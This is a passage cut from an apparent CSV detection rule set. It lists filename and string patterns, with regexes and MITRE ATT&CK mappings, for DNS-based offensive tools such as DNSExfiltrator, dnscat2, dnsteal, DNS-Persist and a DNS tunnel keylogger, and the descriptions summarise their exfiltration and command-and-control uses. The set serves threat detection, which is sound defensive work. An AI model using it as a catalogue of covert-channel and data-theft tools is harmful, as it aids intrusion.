DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy -service*",".{0,1000}dnscrypt\-proxy\s\-service.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscryptproxy.exe*",".{0,1000}dnscryptproxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy.exe*",".{0,1000}dnscrypt\-proxy\.exe.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy.socket*",".{0,1000}dnscrypt\-proxy\.socket.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy.toml*",".{0,1000}dnscrypt\-proxy\.toml.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_arm-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_i386-*.zip*",".{0,1000}dnscrypt\-proxy\-android_i386\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-android_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-android_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-dragonflybsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-dragonflybsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-freebsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-freebsd_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-freebsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-freebsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_arm-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_arm64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_arm64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mips-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mips64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mips64le-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mips64le\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_mipsle-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_mipsle\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_riscv64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_riscv64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-linux_x86_64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-linux_x86_64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-macos_arm64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_arm64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-macos_x86_64-*.zip*",".{0,1000}dnscrypt\-proxy\-macos_x86_64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-master*",".{0,1000}dnscrypt\-proxy\-master.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-netbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-netbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-netbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-openbsd_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-openbsd_i386-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-openbsd_i386\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-solaris_amd64-*.tar.gz*",".{0,1000}dnscrypt\-proxy\-solaris_amd64\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-win32-*.zip*",".{0,1000}dnscrypt\-proxy\-win32\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnscrypt-proxy-win64-*.zip*",".{0,1000}dnscrypt\-proxy\-win64\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*DNS-Enum-*-*.log*",".{0,1000}DNS\-Enum\-.{0,1000}\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*dnsenum.pl*",".{0,1000}dnsenum\.pl.{0,1000}","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/fwaeytens/dnsenum","1","1","N/A","N/A","6","559","130","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z" "*dnsexfiltrator.*",".{0,1000}dnsexfiltrator\..{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*DNSExfiltratorLib*",".{0,1000}DNSExfiltratorLib.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","9","827","180","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z" "*DNSListener.py*",".{0,1000}DNSListener\.py.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*dnslog--airvent.txt*",".{0,1000}dnslog\-\-airvent\.txt.{0,1000}","offensive_tool_keyword","DeNiSe","DeNiSe is a proof of concept for tunneling TCP over DNS in Python","T1071.004 - T1048.003","TA0011 - TA0010 - TA0001","N/A","N/A","C2","https://github.com/mdornseif/DeNiSe","1","1","N/A","10","10","22","10","2021-12-17T18:03:33Z","2010-01-15T07:43:14Z" "*dnslytics-get-rootdomains*",".{0,1000}dnslytics\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*dnsmastermind.rb*",".{0,1000}dnsmastermind\.rb.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*dnsmorph*",".{0,1000}dnsmorph.{0,1000}","offensive_tool_keyword","dnsmorph","DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.","T1568.002 - T1568.003 - T1568.001 - T1568.004","TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/netevert/dnsmorph","1","1","N/A","N/A","3","257","43","2023-08-08T06:38:59Z","2018-02-20T19:13:35Z" "*dnspayload.bin*",".{0,1000}dnspayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*DNS-Persist.git*",".{0,1000}DNS\-Persist\.git.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*dnsproxy start scripts*",".{0,1000}dnsproxy\sstart\sscripts.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*dnsrecon -*",".{0,1000}dnsrecon\s\-.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*dnsrecon*",".{0,1000}dnsrecon.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Information Gathering","https://github.com/darkoperator/dnsrecon","1","1","N/A","6","10","2480","525","2024-04-29T05:52:23Z","2010-12-16T03:25:49Z" "*dnsrecon-zonetransfer*",".{0,1000}dnsrecon\-zonetransfer.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*DnsSpoof.ps1*",".{0,1000}DnsSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DNSStager payloads Available*",".{0,1000}DNSStager\spayloads\sAvailable.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*DNSStager will *",".{0,1000}DNSStager\swill\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*dnsteal.git*",".{0,1000}dnsteal\.git.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*dnsteal.py*",".{0,1000}dnsteal\.py.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*dnsteal-master*",".{0,1000}dnsteal\-master.{0,1000}","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","3","10","1664","230","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" "*dnstracer*",".{0,1000}dnstracer.{0,1000}","offensive_tool_keyword","DNSTracer","This is a python application that traces how a DNS query is performed from a client machine to the server.","T1556 - T1016 - T1046","TA0007 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/pcoder/DNSTracer","1","0","N/A","3","1","6","1","2011-11-11T22:06:48Z","2011-07-07T18:36:07Z" "*DNS-Tunnel-Keylogger*",".{0,1000}DNS\-Tunnel\-Keylogger.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","1","N/A","9","2","196","31","2024-04-13T13:58:04Z","2024-01-10T17:25:58Z" "*dnstwist*",".{0,1000}dnstwist.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 